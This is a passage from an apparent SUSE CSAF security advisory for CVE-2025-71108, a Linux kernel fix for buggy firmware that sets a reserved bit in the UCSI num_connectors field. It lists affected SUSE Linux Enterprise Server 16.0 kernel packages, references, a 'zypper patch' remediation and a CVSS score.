"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: Handle incorrect num_connectors capability\n\nThe UCSI spec states that the num_connectors field is 7 bits, and the\n8th bit is reserved and should be set to zero.\nSome buggy FW has been known to set this bit, and it can lead to a\nsystem not booting.\nFlag that the FW is not behaving correctly, and auto-fix the value\nso that the system boots correctly.\n\nFound on Lenovo P1 G8 during Linux enablement program. The FW will\nbe fixed, but seemed worth addressing in case it hit platforms that\naren\u0027t officially Linux supported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71108",
"url": "https://www.suse.com/security/cve/CVE-2025-71108"
},
{
"category": "external",
"summary": "SUSE Bug 1256774 for CVE-2025-71108",
"url": "https://bugzilla.suse.com/1256774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
